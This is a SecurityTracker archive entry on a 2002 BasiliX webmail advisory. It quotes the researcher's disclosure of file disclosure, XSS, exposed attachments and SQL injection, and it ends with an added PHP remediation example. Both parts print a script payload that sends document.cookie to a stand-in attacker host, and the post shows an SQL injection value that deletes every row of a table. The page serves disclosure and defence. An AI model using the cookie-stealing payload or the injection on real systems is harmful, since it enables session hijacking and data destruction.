SecurityTracker.com
SecurityTracker Archives

Category:   Application (E-mail Server)  >   BasiliX Mail Gateway
Vendors:   Basilix.org
BasiliX Mail Server Has Multiple Flaws That Disclose Files to or Execute SQL Commands from Remote Authenticated Users, Disclose Attachments to Local Users, and Let Remote Users Conduct Cross-site Scripting Attacks
SecurityTracker Alert ID:  1004574
SecurityTracker URL:  http://securitytracker.com/id/1004574
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 19 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1.0 and prior versions
Description:   Several vulnerabilities were reported in the BasiliX mail server. A remote authenticated user can view files on the system that are readable by the web server and possibly execute certain SQL statements. A local user may be able to view the attachments of mail users. A remote user can conduct cross-site scripting attacks against BasiliX users.

It is reported that a remote authenticated user can modify a PHP variable for the temporary location of uploaded files that will not be verified by BasiliX as a valid uploaded file. This allows the remote user to view any file on the same partition as the web server that is readable by the web server.

An input validation bug was reported in the Find Mail function. The 'Subject' header is reportedly displayed without being filtered and, when the user reads a message, the mail body is displayed without being filtered. A remote user can create and send a mail message that contains malicious Javascript in the body or in the subject field so that, when read by a target BasiliX user, the Javascript will be executed by the target user's browser. The code will run in the security context of the BasiliX mail server. As a result, the code will be able to access the target user's cookies associated with the web site running BasiliX and may be able to take actions on that web site acting as the target user.

Some demonstration scripting code is provided:

<script>self.location.href="http://[evilhost]/evil?"+escape(document.cookie)</script>

The server reportedly stores attached files in the '/tmp/BasiliX' directory, where they are readable by any local user.

A remote user can apparently insert SQL statements to be executed by the mail server's underlying SQL server. Some SQL statements used by the server may not encapsulate user-supplied data with apostrophes or quotes and thus are vulnerable.

The vendor has reportedly been notified.

Impact:   A remote authenticated user can view files on the system that are located on the same partition as the mail server and are readable by the web server. A remote authenticated user may be able to inject SQL statements to be executed by the underlying SQL database server. A local user on the mail server can view the attachments of BasiliX mail users. A remote user can conduct cross-site scripting attacks against BasiliX users to steal their authentication cookies.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.basilix.org/
Cause:   Access control error, Input validation error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Date:  Wed, 19 Jun 2002 01:37:42 +0200 (CEST)
Subject:  [VulnWatch] BasiliX multiple vulnerabilities


BasiliX multiple vulnerabilities


PROGRAM: BasiliX
VENDOR: Murat Arslan <arslanm@basilix.org> et al.
HOMEPAGE: http://basilix.org/
VULNERABLE VERSIONS: 1.1.0 and all previous versions
LOGIN REQUIRED: yes (some issues), no (some issues)
SEVERITY: high


DESCRIPTION:

"BasiliX is a webmail application based on PHP and IMAP, and powered with the
MySQL database server. It supports simple mail actions, sending/receiving
attachments, an addressbook with group capability, settings utility, multiple
languages, multiple folders and themes."
(direct quote from the program's project page at Freshmeat)

It is published under the terms of the GNU General Public License.


SECURITY HOLES:

1) The attachment capability in Compose Mail can be fooled into treating any
file on the web server as the uploaded file. This means that it is easy to
steal sensitive information on that server (like the /etc/passwd file), and
mail it off to someone.

When uploading files, PHP sets some global variables, one of which gives the
temporary location where the uploaded file was stored. PHP usually also sets
global variables with GET or POST form data. BasiliX doesn't check if the
attachment really was uploaded by the user, or if it just was some POST data
with the same format.

This issue can be fixed by using the is_uploaded_file() function, to see if a
file was in fact uploaded.

2) The program has got some cross-site scripting issues. In mail folders, in
Find Mail and when you read a message, the Subject mail header is shown
without removing any HTML tags. When a message is read, the mail body is also
shown without removing any HTML tags. This means that an attacker can include
JavaScript code in an e-mail message, and that it will be executed in the
user's browser when he or she looks at that message.

This can be used for stealing a user's cookies, to allow the attacker to take
over the user's session, by including JavaScript code like this:

<script>self.location.href="http://evilhost.com/evil?"+escape(document.cookie)</script>

It can also be used as a form of Denial of Service attack. If there is a
message in your inbox folder that immediately redirects your browser to
Slashdot as soon as you enter that folder, it gets rather hard to read your
e-mail.

This can be fixed by always using the htmlspecialchars() function when
printing variables that shouldn't contain HTML tags.

3) The attached files are saved in /tmp/BasiliX. They are readable by all
users, and it seems like they never get deleted. This means that anyone who
has got shell access to the server, or who can upload web scripts to it, can
read all files any user has ever attached to an e-mail.

4) BasiliX has got some SQL Injection holes. If you have an SQL statement
where data from outside is not placed in apostrophes or quotes, like this:

DELETE FROM table WHERE id=$id

you can wipe all rows in the table by giving $id the value "id". This will
execute the statement:

DELETE FROM table WHERE id=id

The way to fix this is to put all outside data in apostrophes or quotes, like
this:

DELETE FROM table WHERE id='$id'

or to use PHP's is_numeric() function.


COMMUNICATION WITH VENDOR:

The vendor was contacted on the 19th of May. He replied, and we discussed
these issues in a couple of mails. I haven't heard from him since the 26th of
May. No fixed version has been released yet.

To be fair to Murat, he had some excuse for not working on the program. On the
other hand, I think that the users of BasiliX want a secure mail program and
not just excuses.


// Ulf Harnhammar
ulfh@update.uu.se
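The three code-level fixes named in the advisory (is_uploaded_file() for the forged attachment path, htmlspecialchars() for the Subject header and body, and validating the numeric id before it reaches SQL) are shown below as one added example. This is not BasiliX code and not the poster's code; it is written against PHP 7+/8, so it uses the $_FILES superglobal and PDO rather than the register_globals variables of 2002. The function names, the `messages` table and the `attachment` form field are assumptions for illustration. The id check is stricter than the is_numeric() suggested in the post, and the value is bound as a parameter rather than merely quoted, because quoting a string is only safe when it is also escaped.

```php
<?php
// Added example (not BasiliX code). Hardened versions of the three patterns
// the advisory describes; names of functions, fields and tables are assumed.
declare(strict_types=1);

// 1) Attachment upload: accept only a temp path that PHP's own upload handler
//    created for this request. A POSTed field that merely names a server file
//    (the advisory's /etc/passwd case) fails is_uploaded_file() and is dropped.
function attachment_path(array $files, string $field): ?string
{
    if (!isset($files[$field]['tmp_name'], $files[$field]['error'])) {
        return null;
    }
    if ($files[$field]['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    $tmp = $files[$field]['tmp_name'];
    if (!is_string($tmp) || !is_uploaded_file($tmp)) {
        return null;
    }
    return $tmp;
}

// 2) Cross-site scripting: escape every untrusted string before echoing it
//    into HTML. ENT_QUOTES covers attribute contexts as well as text nodes.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 3) SQL injection through an unquoted numeric id: require a plain decimal
//    integer (is_numeric() alone also accepts "1e3", floats and leading
//    whitespace), then bind it as a parameter so it is never parsed as SQL.
function delete_message(PDO $db, string $id): int
{
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('id must be a decimal integer');
    }
    $stmt = $db->prepare('DELETE FROM messages WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Demonstration with constructed inputs; no web server or real upload needed.
$subject = '<script>self.location.href="http://[evilhost]/evil?"+escape(document.cookie)</script>';
echo html_escape($subject), "\n";
// &lt;script&gt;self.location.href=&quot;http://[evilhost]/evil?&quot;+escape(document.cookie)&lt;/script&gt;

// A forged "upload" that names an existing server file is rejected (NULL).
$forged = ['attachment' => ['tmp_name' => '/etc/passwd', 'error' => UPLOAD_ERR_OK]];
var_dump(attachment_path($forged, 'attachment'));

// The id="id" value from the advisory is refused before any query is built.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE messages (id INTEGER PRIMARY KEY, subject TEXT)');
$db->exec("INSERT INTO messages (subject) VALUES ('one'), ('two'), ('three')");
try {
    delete_message($db, 'id');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo delete_message($db, '2'), " row deleted\n"; // exactly one row goes
```

Run it with the pdo_sqlite extension enabled; the three checks are independent, so each function can be dropped into a handler on its own. The world-readable /tmp/BasiliX issue from point 3 of the post is not a code-pattern fix and is not covered here; it is addressed by creating attachment files with a restrictive mode and deleting them when the message is sent.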



 
 



Copyright 2013, SecurityGlobal.net LLC